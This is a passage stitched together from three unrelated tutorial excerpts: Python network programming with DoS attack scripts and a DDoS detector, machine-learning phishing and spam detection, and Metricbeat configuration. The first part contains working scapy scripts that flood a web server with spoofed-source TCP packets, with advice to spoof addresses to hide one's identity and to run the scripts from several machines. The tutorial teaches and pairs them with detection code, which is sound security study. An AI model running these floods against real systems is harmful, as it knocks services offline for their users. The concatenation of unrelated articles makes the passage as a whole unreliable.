☺ ☻ ♥
(1, 2, 3)

First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are like machine code. Values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections.

Consider the situation of the client server model; let's illustrate it by means of an example. Run the struct1.py file. The server-side code is as follows:

import socket
import struct

host = "192.168.0.1"
port = 12347
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
conn, addr = s.accept()
print "connected by", addr
msz = struct.pack('hhl', 1, 2, 3)
conn.send(msz)
conn.close()

The entire code is the same as we have seen previously, with msz = struct.pack('hhl', 1, 2, 3) packing the message and conn.send(msz) sending the message.

Run the unstruc.py file. The client-side code is as follows:

import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.0.1"
port = 12347
s.connect((host, port))
msg = s.recv(1024)
print msg
print struct.unpack('hhl', msg)
s.close()

The client-side code accepts the message and unpacks it in the given format. The output for the client-side code is as follows:

C:\network>python unstruc.py
☺ ☻ ♥
(1, 2, 3)

The output for the server-side code is as follows:

G:\Python\Networking\program>python struct1.py
connected by ('192.168.0.11', 1417)

Now, you must have a fair idea of how to pack and unpack the data.

Format characters

We have seen the format in the pack and unpack methods. In the following table, we have C Type and Python type columns. It denotes the conversion between C and Python types. The Standard size column refers to the size of the packed value in bytes.

Format   C Type               Python type          Standard size
x        pad byte             no value
c        char                 string of length 1   1
b        signed char          integer              1
B        unsigned char        integer              1
?        _Bool                bool                 1
h        short                integer              2
H        unsigned short       integer              2
i        int                  integer              4
I        unsigned int         integer              4
l        long                 integer              4
L        unsigned long        integer              4
q        long long            integer              8
Q        unsigned long long   integer              8
f        float                float                4
d        double               float                8
s        char[]               string
p        char[]               string
P        void *               integer

Let's check what will happen when one value is packed in different formats:

>>> import struct
>>> struct.pack('b',2)
'\x02'
>>> struct.pack('B',2)
'\x02'
>>> struct.pack('h',2)
'\x02\x00'

We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes.
Now, let's use the long int, which is 8 bytes:

>>> struct.pack('q',2)
'\x02\x00\x00\x00\x00\x00\x00\x00'

If we work on a network, ! should be used in the format. The ! is used to avoid the confusion of whether network bytes are little-endian or big-endian. For more information on big-endian and little-endian, you can refer to the Wikipedia page on Endianness:

>>> struct.pack('!q',2)
'\x00\x00\x00\x00\x00\x00\x00\x02'
>>>

You can see the difference when using ! in the format. Before proceeding to sniffing, you should be aware of the following definitions:

- PF_PACKET: It operates at the device driver layer. The pcap library for Linux uses PF_PACKET sockets. To run this, you must be logged in as root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET.
- Raw socket: It does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application.

The following socket methods are used for byte-order conversion:

- socket.ntohl(x): This is the network to host long. It converts a 32-bit positive integer from the network to the host byte order.
- socket.ntohs(x): This is the network to host short. It converts a 16-bit positive integer from the network to the host byte order.
- socket.htonl(x): This is the host to network long. It converts a 32-bit positive integer from the host to the network byte order.
- socket.htons(x): This is the host to network short. It converts a 16-bit positive integer from the host to the network byte order.

So, what is the significance of the preceding four methods? Consider a 16-bit number 0000000000000011. When you send this number from one computer to another computer, its order might get changed. The receiving computer might receive it in another form, such as 1100000000000000. These methods convert from your native byte order to the network byte order and back again.

Now, let's look at the code to implement a network sniffer, which will work on three layers of the TCP/IP, that is, the physical layer (Ethernet), the Network layer (IP), and the TCP layer (port); a minimal sketch of such a sniffer is shown just before the sisp.py listing below.

Introducing DoS and DDoS

In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making it unavailable for the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers. In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out DDoS, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports.

Single IP single port

In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and from a single source port number. This is a very low-level DoS attack, and this will test the web server's request-handling capacity.
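The sniffer listing itself does not appear in this excerpt, so the following is only a minimal sketch of what such a three-layer sniffer can look like; it is an illustration in the spirit of the book's later detection script, not the book's implementation. It assumes a Linux host, root privileges, plain Ethernet framing, and IPv4/TCP packets with a 20-byte IP header (no IP options):

import socket
import struct

# PF_PACKET raw socket; 8 is the IPv4 EtherType (0x0800) in network byte order
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)

while True:
    pkt = s.recvfrom(2048)
    frame = pkt[0]
    # Physical layer: 14-byte Ethernet header (destination MAC, source MAC, EtherType)
    eth_hdr = struct.unpack("!6s6sH", frame[0:14])
    # Network layer: 20-byte IP header, assuming no IP options
    ip_hdr = struct.unpack("!BBHHHBBH4s4s", frame[14:34])
    src_ip = socket.inet_ntoa(ip_hdr[8])
    dst_ip = socket.inet_ntoa(ip_hdr[9])
    # TCP layer: the first four bytes of the TCP header hold the source and destination ports
    src_port, dst_port = struct.unpack("!HH", frame[34:38])
    print "Source IP", src_ip, "-> Destination IP", dst_ip
    print "Source Port", src_port, "-> Destination Port", dst_port

The value 8 passed to socket.socket is the same IPv4 filter used later in DDOS_detect1.py. In practice, you would also check the protocol field of the IP header before unpacking the TCP ports, because non-TCP packets arrive on this socket as well.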
The following is the code of sisp.py:

from scapy.all import *

src = raw_input("Enter the Source IP ")
target = raw_input("Enter the Target IP ")
srcport = int(raw_input("Enter the Source Port "))
i = 1
while True:
    IP1 = IP(src=src, dst=target)
    TCP1 = TCP(sport=srcport, dport=80)
    pkt = IP1 / TCP1
    send(pkt, inter=.001)
    print "packet sent ", i
    i = i + 1

I have used scapy to write this code, and I hope that you are familiar with this. The preceding code asks for three things: the source IP address, the destination IP address, and the source port address. Let's check the output on the attacker's machine:

Single IP with single port

I have used a spoofed IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on the web server. Irrespective of whether it works or not, write your findings in the reports. Let's check the output on the server side:

Wireshark output on the server

This output shows that our packet was successfully sent to the server. Repeat this program with different sequence numbers.

Single IP multiple port

Now, in this attack, we use a single IP address but multiple ports. Here, I have written the code of the simp.py program:

from scapy.all import *

src = raw_input("Enter the Source IP ")
target = raw_input("Enter the Target IP ")
i = 1
while True:
    for srcport in range(1, 65535):
        IP1 = IP(src=src, dst=target)
        TCP1 = TCP(sport=srcport, dport=80)
        pkt = IP1 / TCP1
        send(pkt, inter=.0001)
        print "packet sent ", i
        i = i + 1

I used the for loop for the ports. Let's check the output of the attacker:

Packets from the attacker's machine

The preceding screenshot shows that the packet was sent successfully. Now, check the output on the target machine:

Packets appearing in the target machine

In the preceding screenshot, the rectangular box shows the port numbers. I will leave it to you to create multiple IP with a single port (one possible sketch is shown after this section).

Multiple IP multiple port

In this section, we will discuss the multiple IP with multiple port addresses. In this attack, we use different IPs to send the packet to the target. Multiple IPs denote spoofed IPs. The following program will send a huge number of packets from spoofed IPs:

import random
from scapy.all import *

target = raw_input("Enter the Target IP ")
i = 1
while True:
    a = str(random.randint(1, 254))
    b = str(random.randint(1, 254))
    c = str(random.randint(1, 254))
    d = str(random.randint(1, 254))
    dot = "."
    src = a + dot + b + dot + c + dot + d
    print src
    st = random.randint(1, 1000)
    en = random.randint(1000, 65535)
    loop_break = 0
    for srcport in range(st, en):
        IP1 = IP(src=src, dst=target)
        TCP1 = TCP(sport=srcport, dport=80)
        pkt = IP1 / TCP1
        send(pkt, inter=.0001)
        print "packet sent ", i
        loop_break = loop_break + 1
        i = i + 1
        if loop_break == 50:
            break

In the preceding code, we used the a, b, c, and d variables to store four random strings, ranging from 1 to 254. The src variable stores random IP addresses. Here, we have used the loop_break variable to break the for loop after 50 packets. It means 50 packets originate from one IP, while the rest of the code is the same as the previous one. Let's check the output of the mimp.py program:

Multiple IP with multiple ports

In the preceding screenshot, you can see that after packet 50, the IP addresses get changed. Let's check the output on the target machine:

The target machine's output on Wireshark

Use several machines and execute this code.
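The multiple IP with a single port variant was left as an exercise above. One possible way to write it, assuming the same scapy setup as sisp.py and mimp.py, is sketched here; this is an illustrative variant, not a listing from the book:

import random
from scapy.all import *

target = raw_input("Enter the Target IP ")
srcport = int(raw_input("Enter the Source Port "))
i = 1
while True:
    # Build a random spoofed source IP, as in mimp.py, but keep the source port fixed
    src = ".".join(str(random.randint(1, 254)) for _ in range(4))
    IP1 = IP(src=src, dst=target)
    TCP1 = TCP(sport=srcport, dport=80)
    pkt = IP1 / TCP1
    send(pkt, inter=.001)
    print "packet sent ", i, "from", src
    i = i + 1

As with the other scripts, run this only against machines you own or are explicitly authorized to test.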
In the target machine's Wireshark output shown above, you can see that the machine replies to the source IP. This type of attack is very difficult to detect because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host.

Detection of DDoS

When I was pursuing my Masters of Engineering degree, my friend and I were working on a DDoS attack. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source, so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is the only service running, then only traffic destined for port 80 should be allowed. Now, let's go through a very simple code to detect a DDoS attack. The program's name is DDOS_detect1.py:

import socket
import struct
from datetime import datetime

s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
dict = {}
file_txt = open("dos.txt", 'a')
file_txt.writelines("**********")
t1 = str(datetime.now())
file_txt.writelines(t1)
file_txt.writelines("**********")
file_txt.writelines("\n")
print "Detection Start ......."
D_val = 10
D_val1 = D_val + 10
while True:
    pkt = s.recvfrom(2048)
    ipheader = pkt[0][14:34]
    ip_hdr = struct.unpack("!8sB3s4s4s", ipheader)
    IP = socket.inet_ntoa(ip_hdr[3])
    print "Source IP", IP
    if dict.has_key(IP):
        dict[IP] = dict[IP] + 1
        print dict[IP]
        if (dict[IP] > D_val) and (dict[IP] < D_val1):
            line = "DDOS Detected "
            file_txt.writelines(line)
            file_txt.writelines(IP)
            file_txt.writelines("\n")
    else:
        dict[IP] = 1

In the previous code, we used a sniffer to get the packet's source IP address. The file_txt = open("dos.txt",'a') statement opens a file in append mode, and this dos.txt file is used as a logfile to detect the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val = 10 variable is an assumption just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider the case of a tutorial website. The hits from the college and school IPs would be higher. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable will be used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement will check whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP] = dict[IP] + 1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of packets that come from a particular IP. The if (dict[IP] > D_val) and (dict[IP] < D_val1): statements are the criteria to detect and write results in the dos.txt file; if (dict[IP] > D_val) detects whether the incoming packet's count exceeds the D_val value or not. If it exceeds it, the subsequent statements will write the IP in dos.txt after getting new packets. To avoid redundancy, the (dict[IP] < D_val1) statement has been used. The upcoming statements will write the results in the dos.txt file. Run the program on a server and run mimp.py on the attacker's machine. The following screenshot shows the dos.txt file. Look at that file. It writes a single IP 9 times as we have mentioned D_val1 = D_val + 10.
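The text suggests restricting the detector to web traffic; the following hedged sketch shows one way to do that by also unpacking the TCP ports, under the same assumptions as DDOS_detect1.py (Linux, root privileges, a 20-byte IP header with no options). The port check and the simplified threshold logic are illustrative choices, not part of the original listing:

import socket
import struct

s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
dict = {}
D_val = 10

while True:
    pkt = s.recvfrom(2048)
    ipheader = pkt[0][14:34]
    ip_hdr = struct.unpack("!8sB3s4s4s", ipheader)
    IP = socket.inet_ntoa(ip_hdr[3])
    # TCP ports sit in the first four bytes after the 20-byte IP header
    src_port, dst_port = struct.unpack("!HH", pkt[0][34:38])
    if dst_port != 80:
        continue  # count only traffic aimed at the web server
    dict[IP] = dict.get(IP, 0) + 1
    if dict[IP] > D_val:
        print "Possible DDoS from", IP, "-", dict[IP], "packets to port 80"

From here, you could reuse the dos.txt logging from DDOS_detect1.py, or trigger an action such as adding a firewall rule against the offending IP.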
You can change the D_val value to set the number of requests made by a particular IP. These depend on the old statistics of the website. I hope the preceding code will be useful for research purposes.

Detecting a DDoS attack

If you are a security researcher, the preceding program should be useful to you. You can modify the code such that only the packets that contain port 80 will be allowed (one possible way of doing this is sketched above).

Summary

In this article, we learned about penetration testing using Python. We also learned about sniffing using a Python script and client-side validation, as well as how to bypass client-side validation. We also learned in which situations client-side validation is a good choice. We have gone through how to use Python to fill a form and send the parameters where the GET method has been used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks have been presented in this article. A single IP attack falls into the category of a DoS attack, and a multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for a pentester but also for researchers. Taking advantage of Python DDoS-detection scripts, you can modify the code and create larger code, which can trigger actions to control or mitigate the DDoS attack on the server.

Resources for Article:

Further resources on this subject:

Veil-Evasion [article]
Using the client as a pivot point [article]
Penetration Testing and Setup [article]

Using machine learning for phishing domain detection [Tutorial]

Prasad Ramesh
24 Nov 2018
11 min read
Social engineering is one of the most dangerous threats facing every individual and modern organization. Phishing is a well-known, computer-based, social engineering technique. Attackers use disguised email addresses as a weapon to target large companies. With the huge number of phishing emails received every day, companies are not able to detect all of them. That is why new techniques and safeguards are needed to defend against phishing. This article will present the steps required to build three different machine learning-based projects to detect phishing attempts, using cutting-edge Python machine learning libraries. We will use the following Python libraries: scikit-learn Python (≥ 2.7 or ≥ 3.3) NumPy  (≥ 1.8.2) NLTK Make sure that they are installed before moving forward. You can find the code files here. This article is an excerpt from a book written by Chiheb Chebbi titled Mastering Machine Learning for Penetration Testing. In this book, you will you learn how to identify loopholes in a self-learning security system and will be able to efficiently breach a machine learning system. Social engineering overview Social engineering, by definition, is the psychological manipulation of a person to get useful and sensitive information from them, which can later be used to compromise a system. In other words, criminals use social engineering to gain confidential information from people, by taking advantage of human behavior. Social Engineering Engagement Framework The Social Engineering Engagement Framework (SEEF) is a framework developed by Dominique C. Brack and Alexander Bahmram. It summarizes years of experience in information security and defending against social engineering. The stakeholders of the framework are organizations, governments, and individuals (personals). Social engineering engagement management goes through three steps: Pre-engagement process: Preparing the social engineering operation During-engagement process: The engagement occurs Post-engagement process: Delivering a report There are many social engineering techniques used by criminals: Baiting: Convincing the victim to reveal information, promising him a reward or a gift. Impersonation: Pretending to be someone else. Dumpster diving: Collecting valuable information (papers with addresses, emails, and so on) from dumpsters. Shoulder surfing: Spying on other peoples' machines from behind them, while they are typing. Phishing: This is the most often used technique; it occurs when an attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message. Steps of social engineering penetration testing Penetration testing simulates a black hat hacker attack in order to evaluate the security posture of a company for deploying the required safeguard. Penetration testing is a methodological process, and it goes through well-defined steps. There are many types of penetration testing: White box pentesting Black box pentesting Grey box pentesting To perform a social engineering penetration test, you need to follow the following steps: Building real-time phishing attack detectors using different machine learning models In the next sections, we are going to learn how to build machine learning phishing detectors. We will cover the following two methods: Phishing detection with logistic regression Phishing detection with decision trees Phishing detection with logistic regression In this section, we are going to build a phishing detector from scratch with a logistic regression algorithm. 
Logistic regression is a well-known statistical technique used to make binomial predictions (two classes). Like in every machine learning project, we will need data to feed our machine learning model. For our model, we are going to use the UCI Machine Learning Repository (Phishing Websites Data Set). You can check it out at https://archive.ics.uci.edu/ml/datasets/Phishing+Websites:

The dataset is provided as an arff file:

The following is a snapshot from the dataset:

For better manipulation, we have organized the dataset into a csv file:

As you probably noticed from the attributes, each line of the dataset is represented in the following format – {30 Attributes (having_IP_Address, URL_Length, abnormal_URL, and so on)} + {1 Attribute (Result)}:

For our model, we are going to import two machine learning libraries, NumPy and scikit-learn. Let's open the Python environment and load the required libraries:

>>> import numpy as np
>>> from sklearn import *
>>> from sklearn.linear_model import LogisticRegression
>>> from sklearn.metrics import accuracy_score

Next, load the data:

training_data = np.genfromtxt('dataset.csv', delimiter=',', dtype=np.int32)

Identify the inputs (all of the attributes, except for the last one) and the outputs (the last attribute):

>>> inputs = training_data[:,:-1]
>>> outputs = training_data[:, -1]

We need to divide the dataset into training data and testing data:

training_inputs = inputs[:2000]
training_outputs = outputs[:2000]
testing_inputs = inputs[2000:]
testing_outputs = outputs[2000:]

Create the scikit-learn logistic regression classifier:

classifier = LogisticRegression()

Train the classifier:

classifier.fit(training_inputs, training_outputs)

Make predictions:

predictions = classifier.predict(testing_inputs)

Let's print out the accuracy of our phishing detector model:

accuracy = 100.0 * accuracy_score(testing_outputs, predictions)
print ("The accuracy of your Logistic Regression on testing data is: " + str(accuracy))

The accuracy of our model is approximately 85%. This is a good accuracy, since our model detected 85 phishing URLs out of 100. But let's try to make an even better model with decision trees, using the same data.

Phishing detection with decision trees

To build the second model, we are going to use the same machine learning libraries, so there is no need to import them again. However, we are going to import the decision tree classifier from sklearn:

>>> from sklearn import tree

Create the tree.DecisionTreeClassifier() scikit-learn classifier:

classifier = tree.DecisionTreeClassifier()

Train the model:

classifier.fit(training_inputs, training_outputs)

Compute the predictions:

predictions = classifier.predict(testing_inputs)

Calculate the accuracy:

accuracy = 100.0 * accuracy_score(testing_outputs, predictions)

Then, print out the results:

print ("The accuracy of your decision tree on testing data is: " + str(accuracy))

The accuracy of the second model is approximately 90.4%, which is a great result, compared to the first model. We have now learned how to build two phishing detectors, using two machine learning techniques.
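A possible refinement of the evaluation above, not shown in this excerpt, is to let scikit-learn shuffle and split the dataset instead of cutting it at a fixed row, and to look at per-class precision and recall rather than accuracy alone. The following is only a hedged sketch; it assumes a recent scikit-learn where train_test_split lives in sklearn.model_selection, and the 70/30 split and random_state value are arbitrary choices:

import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report

# Same dataset file as above: 30 attributes followed by the Result column
training_data = np.genfromtxt('dataset.csv', delimiter=',', dtype=np.int32)
inputs = training_data[:, :-1]
outputs = training_data[:, -1]

# Shuffled split instead of a fixed cut at row 2000
X_train, X_test, y_train, y_test = train_test_split(
    inputs, outputs, test_size=0.3, random_state=42)

classifier = DecisionTreeClassifier()
classifier.fit(X_train, y_train)
predictions = classifier.predict(X_test)

# Per-class precision and recall show how many phishing sites slip through
print(classification_report(y_test, predictions))

Because phishing datasets are often imbalanced, the per-class recall is usually the number to watch rather than overall accuracy.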
NLP is a way for machines to analyze, understand, and derive meaning from natural language. NLP is widely used in many fields and applications, such as: Real-time translation Automatic summarization Sentiment analysis Speech recognition Build chatbots Generally, there are two different components of NLP: Natural Language Understanding (NLU): This refers to mapping input into a useful representation. Natural Language Generation (NLG): This refers to transforming internal representations into useful representations. In other words, it is transforming data into written or spoken narrative. Written analysis for business intelligence dashboards is one of NLG applications. Every NLP project goes through five steps. To build an NLP project the first step is identifying and analyzing the structure of words. This step involves dividing the data into paragraphs, sentences, and words. Later we analyze the words in the sentences and relationships among them. The third step involves checking the text for  meaningfulness. Then, analyzing the meaning of consecutive sentences. Finally, we finish the project by the pragmatic analysis. Open source NLP libraries There are many open source Python libraries that provide the structures required to build real-world NLP applications, such as: Apache OpenNLP GATE NLP library Stanford NLP And, of course, Natural Language Toolkit (NLTK) Let's fire up our Linux machine and try some hands-on techniques. Open the Python terminal and import nltk: >>> import nltk Download a book type, as follows: >>> nltk.download() You can also type: >> from nltk.book import * To get text from a link, it is recommended to use the urllib module to crawl a website: >>> from urllib import urlopen >>> url = "http://www.URL_HERE/file.txt" As a demonstration, we are going to load a text called Security.in.Wireless.Ad.Hoc.and.Sensor.Networks: We crawled the text file, and used len to check its length and raw[:50] to display some content. As you can see from the screenshot, the text contains a lot of symbols that are useless for our projects. To get only what we need, we use tokenization: >>> tokens = nltk.word_tokenize(raw) >>> len(tokens) > tokens[:10] To summarize what we learned in the previous section, we saw how to download a web page, tokenize the text, and normalize the words. Spam detection with NLTK Now it is time to build our spam detector using the NLTK. The principle of this type of classifier is simple; we need to detect the words used by spammers. We are going to build a spam/non-spam binary classifier using Python and the nltk library, to detect whether or not an email is spam. First, we need to import the library as usual: >>> import nltk We need to load data and feed our model with an emails dataset. To achieve that, we can use the dataset delivered by the Internet CONtent FIltering Group. 
You can visit the website at https://labs-repos.iit.demokritos.gr/skel/i-config/:

Basically, the website provides four datasets:

- Ling-spam
- PU1
- PU123A
- Enron-spam

For our project, we are going to use the Enron-spam dataset:

Let's download the dataset using the wget command:

Extract the tar.gz file by using the tar -xzf enron1.tar.gz command:

Copy the spam and ham messages into a single emails directory with cp spam/* emails && cp ham/* emails:

To shuffle the emails, let's write a small Python script, Shuffle.py, to do the job:

import os
import random

# initiate a list called emails_list
emails_list = []
Directory = '/home/azureuser/spam_filter/enron1/emails/'
Dir_list = os.listdir(Directory)
for file in Dir_list:
    f = open(Directory + file, 'r')
    emails_list.append(f.read())
    f.close()
# shuffle the collected messages in place
random.shuffle(emails_list)

Just change the Directory variable, and it will shuffle the files:

After preparing the dataset, you should be aware that, as we learned previously, we need to tokenize the emails:

>>> from nltk import word_tokenize

Also, we need to perform another step, called lemmatizing. Lemmatizing connects words that have different forms, like hacker/hackers and is/are. We need to import WordNetLemmatizer:

>>> from nltk import WordNetLemmatizer

Create a sentence for the demonstration, and print out the result of the lemmatizer:

>>> lemmatizer = WordNetLemmatizer()
>>> sentence = "hackers are hacking hacked servers"   # any example sentence works here
>>> [lemmatizer.lemmatize(word.lower()) for word in word_tokenize(unicode(sentence, errors='ignore'))]

Then, we need to remove stopwords, such as of, is, the, and so on:

from nltk.corpus import stopwords
stop = stopwords.words('english')

To process the email, a function called Process must be created, to lemmatize and tokenize our dataset:

def Process(data):
    lemmatizer = WordNetLemmatizer()
    return [lemmatizer.lemmatize(word.lower()) for word in word_tokenize(unicode(data, errors='ignore'))]

The second step is feature extraction, by reading the emails' words:

from collections import Counter

def Features_Extraction(text, setting):
    if setting == 'bow':
        # Bow means bag-of-words
        return {word: count for word, count in Counter(Process(text)).items() if not word in stop}
    else:
        return {word: True for word in Process(text) if not word in stop}

Extract the features:

features = [(Features_Extraction(email, 'bow'), label) for (email, label) in emails]

Now, let's define the model training Python function:

def training_Model(Features, samples):
    Size = int(len(Features) * samples)
    training, testing = Features[:Size], Features[Size:]
    print ('Training = ' + str(len(training)) + ' emails')
    print ('Testing = ' + str(len(testing)) + ' emails')
    # return both sets so they can be used by the classifier and the evaluation below
    return training, testing

As a classification algorithm, we are going to use NaiveBayesClassifier:

from nltk import NaiveBayesClassifier, classify
classifier = NaiveBayesClassifier.train(training)

Finally, we define the evaluation Python function (a sketch that wires these functions together end to end follows the summary below):

def evaluate(training, testing, classifier):
    print ('Training Accuracy is ' + str(classify.accuracy(classifier, training)))
    print ('Testing Accuracy is ' + str(classify.accuracy(classifier, testing)))

In this article, we learned to detect phishing attempts by building three different projects from scratch. First, we discovered how to develop a phishing detector using two different machine learning techniques: logistic regression and decision trees. The third project was a spam filter, based on NLP and Naive Bayes classification. To become a master at penetration testing using machine learning with Python, check out this book Mastering Machine Learning for Penetration Testing.
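For completeness, here is a hedged sketch of how the functions defined above might be wired together end to end. The emails list of (text, label) pairs and the 80/20 split ratio are assumptions made for illustration; they are not taken from this excerpt:

from nltk import NaiveBayesClassifier, classify

# 'emails' is assumed to be a list of (text, label) pairs built from the
# extracted Enron-spam files, with label 'spam' or 'ham'
features = [(Features_Extraction(email, 'bow'), label) for (email, label) in emails]

# 80% training, 20% testing, using the training_Model function defined above
training, testing = training_Model(features, 0.8)

classifier = NaiveBayesClassifier.train(training)
evaluate(training, testing, classifier)

# The most informative features usually surface typical spam vocabulary
classifier.show_most_informative_features(10)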
Google’s Protect your Election program: Security policies to defend against state-sponsored phishing attacks, and influence campaigns
How the Titan M chip will improve Android security
New cybersecurity threats posed by artificial intelligence


How to Configure Metricbeat for Application and Server infrastructure

Pravin Dhandre
23 Feb 2018
8 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Pranav Shukla and Sharath Kumar M N titled Learning Elastic Stack 6.0. This book provides detailed understanding in how you can employ Elastic Stack in performing distributed analytics along with resolving various data processing challenges.[/box] In today’s tutorial, we will show the step-by-step configuration of Metricbeat, a Beats platform for monitoring server and application infrastructure. Configuring Metricbeat   The configurations related to Metricbeat are stored in a configuration file named metricbeat.yml, and it uses YAML syntax. The metricbeat.yml file contains the following: Module configuration General settings Output configuration Processor configuration Path configuration Dashboard configuration Logging configuration Let's explore some of these sections. Module configuration Metricbeat comes bundled with various modules to collect metrics from the system and applications such as Apache, MongoDB, Redis, MySQL, and so on. Metricbeat provides two ways of enabling modules and metricsets: Enabling module configs in the modules.d directory Enabling module configs in the metricbeat.yml file Enabling module configs in the modules.d directory The modules.d directory contains default configurations for all the modules available in Metricbeat. The configuration specific to a module is stored in a .yml file with the name of the file being the name of the module. For example, the configuration related to the MySQL module would be stored in the mysql.yml file. By default, excepting the system module, all other modules are disabled. To list the modules that are available in Metricbeat, execute the following command: Windows: D:packtmetricbeat-6.0.0-windows-x86_64>metricbeat.exe modules list Linux: [locationOfMetricBeat]$./metricbeat modules list The modules list command displays all the available modules and also lists which modules are currently enabled/disabled. As each module comes with the default configurations, make the appropriate changes in the module configuration file. The basic configuration for mongodb module will look as follows: - module: mongodb metricsets: ["dbstats", "status"] period: 10s hosts: ["localhost:27017"] username: user password: pass To enable it, execute the modules enable command, passing one or more module name. For example: Windows: D:packtmetricbeat-6.0.0-windows-x86_64>metricbeat.exe modules enable redis mongodb Linux: [locationOfMetricBeat]$./metricbeat modules enable redis mongodb Similar to disable modules, execute the modules disable command, passing one or more module names to it. For example: Windows: D:packtmetricbeat-6.0.0-windows-x86_64>metricbeat.exe modules disable redis mongodb Linux: [locationOfMetricBeat]$./metricbeat modules disable redis mongodb To enable dynamic config reloading, set reload.enabled to true and to specify the frequency to look for config file changes. Set the reload.period parameter under the metricbeat.config.modules property. For example: #metricbeat.yml metricbeat.config.modules: path: ${path.config}/modules.d/*.yml reload.enabled: true reload.period: 20s Enabling module config in the metricbeat.yml file If one is used to earlier versions of Metricbeat, one can enable the modules and metricsets in the metricbeat.yml file directly by adding entries to the metricbeat.modules list. Each entry in the list begins with a dash (-) and is followed by the settings for that module. 
For Example: metricbeat.modules: #------------------ Memcached Module ----------------------------- - module: memcached metricsets: ["stats"] period: 10s hosts: ["localhost:11211"] #------------------- MongoDB Module ------------------------------ - module: mongodb metricsets: ["dbstats", "status"] period: 5s It is possible to specify the module multiple times and specify a different period to use for one or more metricset. For example: #------- Couchbase Module ----------------------------- - module: couchbase metricsets: ["bucket"] period: 15s hosts: ["localhost:8091"] - module: couchbase metricsets: ["cluster", "node"] period: 30s hosts: ["localhost:8091"] General settings This section contains configuration options and some general settings to control the behavior of Metricbeat. Some of the configuration options/settings are: name: The name of the shipper that publishes the network data. By default, hostname is used for this field: name: "dc1-host1" tags: The list of tags that will be included in the tags field of every event Metricbeat ships. Tags make it easy to group servers by different logical properties and help when filtering events in Kibana and Logstash: tags: ["staging", "web-tier","dc1"] max_procs: The maximum number of CPUs that can be executing simultaneously. The default is the number of logical CPUs available in the System: max_procs: 2 Output configuration This section is used to configure outputs where the events need to be shipped. Events can be sent to single or multiple outputs simultaneously. The allowed outputs are Elasticsearch, Logstash, Kafka, Redis, file, and console. Some of the outputs that can be configured are as follows: elasticsearch: It is used to send the events directly to Elasticsearch. A sample Elasticsearch output configuration is shown in the following code snippet: output.elasticsearch: enabled: true hosts: ["localhost:9200"] Using the enabled setting, one can enable or disable the output. hosts accepts one or more Elasticsearch node/server. Multiple hosts can be defined for failover purposes. When multiple hosts are configured, the events are distributed to these nodes in round robin order. If Elasticsearch is secured, then the credentials can be passed using the username and password settings: output.elasticsearch: enabled: true hosts: ["localhost:9200"] username: "elasticuser" password: "password" To ship the events to the Elasticsearch ingest node pipeline so that they can be pre-processed before being stored in Elasticsearch, the pipeline information can be provided using the pipleline setting: output.elasticsearch: enabled: true hosts: ["localhost:9200"] pipeline: "ngnix_log_pipeline" The default index the data gets written to is of the format metricbeat-%{[beat.version]}-%{+yyyy.MM.dd}. This will create a new index every day. For example if today is December 2, 2017 then all the events are placed in the metricbeat-6.0.0-2017-12-02 index. One can override the index name or the pattern using the index setting. In the following configuration snippet, a new index is created for every month: output.elasticsearch: hosts: ["http://localhost:9200"] index: "metricbeat-%{[beat.version]}-%{+yyyy.MM}" Using the indices setting, one can conditionally place the events in the appropriate index that matches the specified condition. In the following code snippet, if the message contains the DEBUG string, it will be placed in the debug-%{+yyyy.MM.dd} index. If the message contains the ERR string, it will be placed in the error-%{+yyyy.MM.dd} index. 
